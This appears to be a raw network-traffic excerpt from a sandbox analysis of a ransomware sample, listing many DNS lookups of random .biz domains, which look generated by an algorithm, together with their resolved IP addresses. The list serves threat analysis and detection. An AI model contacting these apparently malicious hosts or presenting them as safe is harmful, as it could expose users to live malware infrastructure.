8.8.8.8.in-addr.arpa
8.8.8.8:53

pywolwnvd.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

54.244.188.177
8.8.8.8:53

pywolwnvd.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

54.244.188.177
8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

ssbzmoy.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
73 B
1
1

DNS Request

ssbzmoy.biz

DNS Response

18.141.10.107
8.8.8.8:53

ssbzmoy.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
73 B
1
1

DNS Request

ssbzmoy.biz

DNS Response

18.141.10.107
8.8.8.8:53

177.188.244.54.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

177.188.244.54.in-addr.arpa
8.8.8.8:53

cvgrf.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
71 B
1
1

DNS Request

cvgrf.biz

DNS Response

54.244.188.177
8.8.8.8:53

cvgrf.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
87 B
1
1

DNS Request

cvgrf.biz

DNS Response

107.178.223.183

104.155.138.21
8.8.8.8:53

107.10.141.18.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

107.10.141.18.in-addr.arpa
8.8.8.8:53

npukfztj.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

npukfztj.biz

DNS Response

44.221.84.105
8.8.8.8:53

przvgke.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
105 B
1
1

DNS Request

przvgke.biz

DNS Response

54.157.24.8

44.208.124.139

34.193.97.35
8.8.8.8:53

zlenh.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

knjghuig.biz

DNS Response

18.141.10.107
8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

105.84.221.44.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

105.84.221.44.in-addr.arpa
8.8.8.8:53

8.24.157.54.in-addr.arpa

dns

70 B
123 B
1
1

DNS Request

8.24.157.54.in-addr.arpa
8.8.8.8:53

uhxqin.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

183.223.178.107.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

183.223.178.107.in-addr.arpa
8.8.8.8:53

npukfztj.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

npukfztj.biz

DNS Response

44.221.84.105
8.8.8.8:53

przvgke.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
105 B
1
1

DNS Request

przvgke.biz

DNS Response

54.157.24.8

44.208.124.139

34.193.97.35
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

zlenh.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

knjghuig.biz

DNS Response

18.141.10.107
8.8.8.8:53

uhxqin.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

vjaxhpbji.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

vjaxhpbji.biz

DNS Response

82.112.184.197
8.8.8.8:53

vjaxhpbji.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

vjaxhpbji.biz

DNS Response

82.112.184.197
8.8.8.8:53

144.107.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

144.107.17.2.in-addr.arpa
8.8.8.8:53

xlfhhhm.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

xlfhhhm.biz

DNS Response

44.200.43.61
8.8.8.8:53

ifsaia.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

ifsaia.biz

DNS Response

13.251.16.150
8.8.8.8:53

saytjshyf.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
150 B
2
2

DNS Request

saytjshyf.biz

DNS Request

saytjshyf.biz

DNS Response

3.237.86.197

DNS Response

3.237.86.197
8.8.8.8:53

vcddkls.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

vcddkls.biz

DNS Response

18.141.10.107
8.8.8.8:53

61.43.200.44.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

61.43.200.44.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

150.16.251.13.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

150.16.251.13.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

fwiwk.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
103 B
1
1

DNS Request

fwiwk.biz

DNS Response

54.157.24.8

34.193.97.35

44.208.124.139
8.8.8.8:53

197.86.237.3.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

197.86.237.3.in-addr.arpa
8.8.8.8:53

tbjrpv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

tbjrpv.biz

DNS Response

34.246.200.160
8.8.8.8:53

deoci.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

deoci.biz

DNS Response

54.80.154.23
8.8.8.8:53

gytujflc.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

gytujflc.biz

DNS Response

208.100.26.245
8.8.8.8:53

160.200.246.34.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

160.200.246.34.in-addr.arpa
8.8.8.8:53

23.154.80.54.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

23.154.80.54.in-addr.arpa
8.8.8.8:53

qaynky.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

qaynky.biz

DNS Request

qaynky.biz

DNS Response

13.251.16.150

DNS Response

13.251.16.150
8.8.8.8:53

245.26.100.208.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

245.26.100.208.in-addr.arpa
8.8.8.8:53

bumxkqgxu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

bumxkqgxu.biz

DNS Response

44.221.84.105
8.8.8.8:53

dwrqljrr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

dwrqljrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

nqwjmb.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

nqwjmb.biz

DNS Request

nqwjmb.biz

DNS Response

35.164.78.200

DNS Response

35.164.78.200
8.8.8.8:53

ytctnunms.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
150 B
2
2

DNS Request

ytctnunms.biz

DNS Request

ytctnunms.biz

DNS Response

3.94.10.34

DNS Response

3.94.10.34
8.8.8.8:53

myups.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
87 B
1
1

DNS Request

myups.biz

DNS Response

165.160.13.20

165.160.15.20
8.8.8.8:53

oshhkdluh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

oshhkdluh.biz

DNS Response

54.244.188.177
8.8.8.8:53

yunalwv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

yunalwv.biz

DNS Response

208.100.26.245
8.8.8.8:53

jpskm.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

jpskm.biz

DNS Response

34.211.97.45
8.8.8.8:53

34.10.94.3.in-addr.arpa

dns

138 B
242 B
2
2

DNS Request

34.10.94.3.in-addr.arpa

DNS Request

34.10.94.3.in-addr.arpa
8.8.8.8:53

200.78.164.35.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

200.78.164.35.in-addr.arpa
8.8.8.8:53

20.13.160.165.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

20.13.160.165.in-addr.arpa
8.8.8.8:53

lrxdmhrr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

lrxdmhrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

wllvnzb.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

wllvnzb.biz

DNS Request

wllvnzb.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

45.97.211.34.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

45.97.211.34.in-addr.arpa
8.8.8.8:53

gnqgo.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

gnqgo.biz

DNS Request

gnqgo.biz

DNS Response

54.80.154.23

DNS Response

54.80.154.23
8.8.8.8:53

jhvzpcfg.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

jhvzpcfg.biz

DNS Response

3.237.86.197
8.8.8.8:53

acwjcqqv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

116 B
148 B
2
2

DNS Request

acwjcqqv.biz

DNS Request

acwjcqqv.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

xlfhhhm.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

xlfhhhm.biz

DNS Response

44.200.43.61
8.8.8.8:53

ifsaia.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

ifsaia.biz

DNS Response

13.251.16.150
8.8.8.8:53

lejtdj.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
118 B
1
1

DNS Request

lejtdj.biz
8.8.8.8:53

vyome.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

vyome.biz

DNS Request

vyome.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

yauexmxk.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

yauexmxk.biz

DNS Response

54.80.154.23
8.8.8.8:53

iuzpxe.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

iuzpxe.biz

DNS Response

13.251.16.150
8.8.8.8:53

saytjshyf.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

saytjshyf.biz

DNS Response

3.237.86.197
8.8.8.8:53

vcddkls.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

vcddkls.biz

DNS Response

18.141.10.107
8.8.8.8:53

86.104.213.44.in-addr.arpa

dns

144 B
254 B
2
2

DNS Request

86.104.213.44.in-addr.arpa

DNS Request

86.104.213.44.in-addr.arpa
8.8.8.8:53

sxmiywsfv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

sxmiywsfv.biz

DNS Response

13.251.16.150
8.8.8.8:53

fwiwk.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
103 B
1
1

DNS Request

fwiwk.biz

DNS Response

54.157.24.8

34.193.97.35

44.208.124.139
8.8.8.8:53

tbjrpv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

tbjrpv.biz

DNS Response

34.246.200.160
8.8.8.8:53

deoci.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

deoci.biz

DNS Response

54.80.154.23
8.8.8.8:53

gytujflc.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

116 B
148 B
2
2

DNS Request

gytujflc.biz

DNS Request

gytujflc.biz

DNS Response

208.100.26.245

DNS Response

208.100.26.245
8.8.8.8:53

vrrazpdh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

vrrazpdh.biz

DNS Response

34.211.97.45

DNS Request

whjovd.biz

DNS Response

18.141.10.107
8.8.8.8:53

qaynky.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

qaynky.biz

DNS Response

13.251.16.150
8.8.8.8:53

ftxlah.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

ftxlah.biz

DNS Response

34.218.204.173
8.8.8.8:53

typgfhb.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

typgfhb.biz

DNS Response

13.251.16.150
8.8.8.8:53

bumxkqgxu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

bumxkqgxu.biz

DNS Response

44.221.84.105
8.8.8.8:53

dwrqljrr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

dwrqljrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

173.204.218.34.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

173.204.218.34.in-addr.arpa
8.8.8.8:53

esuzf.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

esuzf.biz

DNS Response

34.211.97.45
8.8.8.8:53

nqwjmb.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

nqwjmb.biz

DNS Response

35.164.78.200
8.8.8.8:53

gvijgjwkh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
150 B
2
2

DNS Request

gvijgjwkh.biz

DNS Request

gvijgjwkh.biz

DNS Response

3.94.10.34

DNS Response

3.94.10.34
8.8.8.8:53

ytctnunms.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

ytctnunms.biz

DNS Response

3.94.10.34
8.8.8.8:53

qpnczch.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

qpnczch.biz

DNS Response

44.213.104.86
8.8.8.8:53

myups.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
87 B
1
1

DNS Request

myups.biz

DNS Response

165.160.13.20

165.160.15.20
8.8.8.8:53

brsua.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

brsua.biz

DNS Request

brsua.biz

DNS Response

3.254.94.185

DNS Response

3.254.94.185
8.8.8.8:53

dlynankz.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

dlynankz.biz

DNS Response

85.214.228.140
8.8.8.8:53

oflybfv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

oflybfv.biz

DNS Request

oflybfv.biz

DNS Response

44.200.43.61

DNS Response

44.200.43.61
8.8.8.8:53

oshhkdluh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

oshhkdluh.biz

DNS Response

54.244.188.177
8.8.8.8:53

yhqqc.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

yhqqc.biz

DNS Response

34.211.97.45
8.8.8.8:53

yunalwv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

yunalwv.biz

DNS Response

208.100.26.245
8.8.8.8:53

185.94.254.3.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

185.94.254.3.in-addr.arpa
8.8.8.8:53

140.228.214.85.in-addr.arpa

dns

146 B
224 B
2
2

DNS Request

140.228.214.85.in-addr.arpa

DNS Request

140.228.214.85.in-addr.arpa
8.8.8.8:53

jpskm.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

jpskm.biz

DNS Request

jpskm.biz

DNS Response

34.211.97.45

DNS Response

34.211.97.45
8.8.8.8:53

mnjmhp.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

mnjmhp.biz

DNS Request

mnjmhp.biz

DNS Response

44.200.43.61

DNS Response

44.200.43.61
8.8.8.8:53

opowhhece.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

opowhhece.biz

DNS Response

18.208.156.248
8.8.8.8:53

zjbpaao.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
119 B
1
1

DNS Request

zjbpaao.biz
8.8.8.8:53

jdhhbs.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

jdhhbs.biz

DNS Response

13.251.16.150
8.8.8.8:53

lrxdmhrr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

lrxdmhrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

248.156.208.18.in-addr.arpa

dns

73 B
129 B
1
1

DNS Request

248.156.208.18.in-addr.arpa
8.8.8.8:53

wllvnzb.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

wllvnzb.biz

DNS Request

wllvnzb.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

mgmsclkyu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

mgmsclkyu.biz

DNS Response

34.246.200.160
8.8.8.8:53

warkcdu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

warkcdu.biz

DNS Request

warkcdu.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

gnqgo.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

gnqgo.biz

DNS Response

54.80.154.23
8.8.8.8:53

jhvzpcfg.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

jhvzpcfg.biz

DNS Response

3.237.86.197
8.8.8.8:53

acwjcqqv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

170 B
218 B
3
3

DNS Request

acwjcqqv.biz

DNS Response

18.141.10.107

DNS Request

lpuegx.biz

DNS Request

lpuegx.biz

DNS Response

82.112.184.197

DNS Response

82.112.184.197
8.8.8.8:53

gcedd.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

gcedd.biz

DNS Request

gcedd.biz

DNS Response

13.251.16.150

DNS Response

13.251.16.150
8.8.8.8:53

lejtdj.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
118 B
1
1

DNS Request

lejtdj.biz
8.8.8.8:53

vyome.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

vyome.biz

DNS Request

vyome.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

yauexmxk.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

116 B
148 B
2
2

DNS Request

yauexmxk.biz

DNS Request

yauexmxk.biz

DNS Response

54.80.154.23

DNS Response

54.80.154.23
8.8.8.8:53

jwkoeoqns.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
150 B
2
2

DNS Request

jwkoeoqns.biz

DNS Request

jwkoeoqns.biz

DNS Response

18.208.156.248

DNS Response

18.208.156.248
8.8.8.8:53

iuzpxe.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

iuzpxe.biz

DNS Request

iuzpxe.biz

DNS Response

13.251.16.150

DNS Response

13.251.16.150
8.8.8.8:53

xccjj.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

xccjj.biz

DNS Response

44.213.104.86
8.8.8.8:53

hehckyov.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

hehckyov.biz

DNS Response

44.221.84.105
8.8.8.8:53

rynmcq.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

rynmcq.biz

DNS Request

rynmcq.biz

DNS Response

54.244.188.177

DNS Response

54.244.188.177
8.8.8.8:53

sxmiywsfv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

sxmiywsfv.biz

DNS Response

13.251.16.150
8.8.8.8:53

uaafd.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

uaafd.biz

DNS Response

3.254.94.185
8.8.8.8:53

eufxebus.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

eufxebus.biz

DNS Response

18.141.10.107
8.8.8.8:53

vrrazpdh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

vrrazpdh.biz

DNS Response

34.211.97.45
8.8.8.8:53

pwlqfu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

pwlqfu.biz

DNS Response

34.246.200.160
8.8.8.8:53

ftxlah.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

ftxlah.biz

DNS Response

34.218.204.173
8.8.8.8:53

rrqafepng.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

rrqafepng.biz

DNS Response

44.200.43.61
8.8.8.8:53

ctdtgwag.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

ctdtgwag.biz

DNS Response

3.94.10.34
8.8.8.8:53

typgfhb.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

typgfhb.biz

DNS Response

13.251.16.150
8.8.8.8:53

tnevuluw.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

tnevuluw.biz

DNS Response

35.164.78.200
8.8.8.8:53

esuzf.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

esuzf.biz

DNS Response

34.211.97.45
8.8.8.8:53

gvijgjwkh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

gvijgjwkh.biz

DNS Response

3.94.10.34
8.8.8.8:53

gjogvvpsf.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

gjogvvpsf.biz

DNS Response

208.100.26.245
8.8.8.8:53

qpnczch.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

qpnczch.biz

DNS Response

44.213.104.86
8.8.8.8:53

reczwga.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

reczwga.biz

DNS Response

3.237.86.197
8.8.8.8:53

brsua.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

brsua.biz

DNS Response

3.254.94.185
8.8.8.8:53

bghjpy.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

bghjpy.biz

DNS Response

34.211.97.45
8.8.8.8:53

dlynankz.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

dlynankz.biz

DNS Response

85.214.228.140
8.8.8.8:53

oflybfv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

oflybfv.biz

DNS Response

44.200.43.61
8.8.8.8:53

damcprvgv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

damcprvgv.biz

DNS Response

54.80.154.23
8.8.8.8:53

yhqqc.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

yhqqc.biz

DNS Response

34.211.97.45
8.8.8.8:53

ocsvqjg.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

ocsvqjg.biz

DNS Request

ocsvqjg.biz

DNS Response

3.254.94.185

DNS Response

3.254.94.185
8.8.8.8:53

ywffr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

ywffr.biz

DNS Response

54.244.188.177
8.8.8.8:53

mnjmhp.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
160 B
2
2

DNS Request

mnjmhp.biz

DNS Request

mnjmhp.biz

DNS Response

44.200.43.61

DNS Response

107.178.223.183

104.155.138.21
8.8.8.8:53

opowhhece.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

opowhhece.biz

DNS Response

18.208.156.248
8.8.8.8:53

ecxbwt.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

ecxbwt.biz

DNS Response

54.244.188.177
8.8.8.8:53

zjbpaao.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
238 B
2
2

DNS Request

zjbpaao.biz

DNS Request

zjbpaao.biz
8.8.8.8:53

jdhhbs.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

jdhhbs.biz

DNS Response

13.251.16.150
8.8.8.8:53

pectx.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

pectx.biz

DNS Request

pectx.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

zyiexezl.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

116 B
148 B
2
2

DNS Request

zyiexezl.biz

DNS Request

zyiexezl.biz

DNS Response

54.80.154.23

DNS Response

